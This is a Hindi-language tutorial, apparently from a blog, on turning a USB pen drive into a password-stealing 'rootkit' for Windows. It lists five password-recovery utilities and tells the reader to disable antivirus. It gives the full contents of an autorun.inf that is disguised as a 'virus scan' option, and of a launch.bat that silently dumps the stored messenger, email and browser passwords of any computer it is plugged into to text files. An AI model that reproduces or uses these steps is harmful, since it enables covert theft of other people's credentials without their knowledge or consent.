यूएसबी ड्राइव का उपयोग करके पासवर्ड कैसे हैक करें USB drive ka upayog karake paasavard kaise haik karen

USB drive ka upayog karake paasavard kaise haik karen
जैसा कि हम सभी जानते हैं कि विंडोज में ज्यादातर पासवर्ड स्टोर किए जाते हैं, जिनका इस्तेमाल रोजाना किया जाता है, जिसमें इंस्टेंट मैसेंजर पासवर्ड जैसे एमएसएन, याहू, एओएल, विंडोज मैसेंजर आदि शामिल हैं । इनके साथ ही विंडोज आउटलुक एक्सप्रेस, एसएमटीपी, पीओपी के पासवर्ड भी स्टोर करता है । , FTP खातों और IE और फ़ायरफ़ॉक्स जैसे कई ब्राउज़रों के ऑटो-पूर्ण पासवर्ड ।
इन पासवर्डों को उनके संग्रहित स्थानों से उबारने के लिए कई उपकरण मौजूद हैं । इन उपकरणों और एक यूएसबी पेन-ड्राइव का उपयोग करके, आप किसी भी कंप्यूटर से पासवर्ड को सूँघने के लिए अपना स्वयं का रूटकिट बना सकते हैं । हमें अपने रूटकिट बनाने के लिए निम्नलिखित उपकरणों की आवश्यकता है:
मेसेनपास : सबसे लोकप्रिय इंस्टेंट मैसेंजर प्रोग्राम्स के पासवर्ड को फिर से प्राप्त करता है: एमएसएन मैसेंजर, विंडोज मैसेंजर, याहू मैसेंजर, आईसीक्यू लाइट 4.x / 2003, एओएल इंस्टेंट मैसेंजर नेटस्केप 7, ट्रिलियन, मिरांडा और जीएआईएम के साथ प्रदान किया गया ।
मेल पास व्यू : निम्नलिखित ईमेल कार्यक्रमों के पासवर्ड को पुनर्प्राप्त करता है: आउटलुक एक्सप्रेस, माइक्रोसॉफ्ट आउटलुक 2000 (POP3 और SMTP खाते केवल), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP और SMTP खाते), IncrediMail, Eletora, नेटस्केप मेल, मोज़िला थंडरबर्ड, ग्रुप मेल फ्री ।
यदि आप इन खातों के संबद्ध कार्यक्रमों का उपयोग करते हैं, तो मेल पासव्यू वेब-आधारित ईमेल खातों (हॉटमेल, याहू !, जीमेल) के पासवर्ड को भी पुनर्प्राप्त कर सकता है ।
IE Passview : IE PassView एक छोटी उपयोगिता है जो इंटरनेट एक्सप्लोरर ब्राउज़र द्वारा संग्रहीत पासवर्ड को प्रकट करता है । यह नए इंटरनेट एक्सप्लोरर 7.0, साथ ही इंटरनेट एक्सप्लोरर के पुराने संस्करणों, v4.0 - v6.0 का समर्थन करता है
संरक्षित संग्रहण पासव्यू : संरक्षित स्टोरेज के अंदर संग्रहीत सभी पासवर्ड को पुनर्प्राप्त करता है , जिसमें इंटरनेट एक्सप्लोरर के स्वत: पूर्ण पासवर्ड, पासवर्ड से सुरक्षित साइटों के पासवर्ड, एमएसएन एक्सप्लोरर पासवर्ड और बहुत कुछ शामिल हैं ।
पासवर्ड : पासवर्डफ़ॉक्स एक छोटा पासवर्ड रिकवरी टूल है जो आपको मोज़िला फ़ायरफ़ॉक्स वेब ब्राउज़र द्वारा संग्रहीत उपयोगकर्ता नाम और पासवर्ड देखने की अनुमति देता है । डिफ़ॉल्ट रूप से, पासवर्डफ़ॉक्स आपके वर्तमान प्रोफ़ाइल में संग्रहीत पासवर्ड प्रदर्शित करता है, लेकिन आप आसानी से किसी अन्य फ़ायरफ़ॉक्स प्रोफ़ाइल के पासवर्ड देखने का चयन कर सकते हैं । प्रत्येक पासवर्ड प्रविष्टि के लिए, निम्नलिखित जानकारी प्रदर्शित की जाती है:
रिकॉर्ड इंडेक्स, वेब साइट, उपयोगकर्ता नाम, पासवर्ड, उपयोगकर्ता नाम फ़ील्ड और पासवर्ड फ़ील्ड ।

पासवर्ड हैकिंग के लिए आपका USB ड्राइव तैयार करना:

यहां पासवर्ड हैकिंग टूलकिट बनाने के लिए चरणबद्ध तरीके से कदम रखा गया है:
इन चरणों का पालन करने से पहले आपको अपने एंटीवायरस को अस्थायी रूप से अक्षम करना होगा ।
  1. सभी 5 उपकरण डाउनलोड करें , उन्हें निकालें और अपने USB पेनड्राइव पर केवल निष्पादन योग्य फ़ाइलों (.exe फ़ाइलों) को कॉपी करें ।
    यानी: फ़ाइलों को कॉपी करें - mspass.exe , mailpv.exe , iepv.exe , pspv.exe और passwordfox.exe को अपने यूएसबी ड्राइव में ।
  2. एक नया नोटपैड बनाएं और उसमें निम्नलिखित पाठ लिखें:
    [autorun] open = launch.bat ACTION = एक वायरस स्कैन करें
    बचाने नोटपैड और इसका नाम बदलना से नया पाठ Document.txt को autorun.infअब अपने USB पेन-ड्राइव पर autorun.inf फाइल को कॉपी करें
  3. एक और नोटपैड बनाएं और उस पर निम्नलिखित पाठ लिखें:
    mspass.exe / stext mspass.txt  प्रारंभ  प्रारंभ mailpv.exe / stext mailpv.txt प्रारंभ iepv.exe / stext iepv.txt प्रारंभ pspv.exe / stext pspv.txt  प्रारंभ पासवर्डसो । exe / stext passwordfox.txt  प्रारंभ करें 
    नोटपैड को सहेजें और इसे नया टेक्स्ट डॉक्यूमेंट.टेक्स्ट से लॉन्च करने के लिए नाम बदलें अपने USB ड्राइव में लॉन्च .bat फ़ाइल की प्रतिलिपि बनाएँ
    अब आपका रूटकिट तैयार है और आप पासवर्ड को सूँघने के लिए पूरी तरह तैयार हैं । संग्रहीत पासवर्ड को सूँघने के लिए आप किसी भी कंप्यूटर पर इस पेन-ड्राइव का उपयोग कर सकते हैं । बस इन चरणों का पालन करें:
    1. पेन-ड्राइव डालें और ऑटो-रन विंडो पॉप-अप होगी । (ऐसा इसलिए है, क्योंकि हमने एक ऑटो-रन पेन-ड्राइव बनाया है) ।
    2. पॉप-अप विंडो में, पहला विकल्प चुनें ( एक वायरस स्कैन करें ) ।
    3. अब सभी पासवर्ड रिकवरी टूल चुपचाप पृष्ठभूमि में निष्पादित हो जाएंगे (यह प्रक्रिया मुश्किल से कुछ सेकंड्स में होती है) । पासवर्ड .TXT फ़ाइलों में संग्रहीत हो जाते हैं
    4. पेन-ड्राइव निकालें और आपको .TXT फ़ाइलों में संग्रहीत पासवर्ड दिखाई देंगे
यह हैक विंडोज 2000, एक्सपी, विस्टा और 7 पर काम करता है|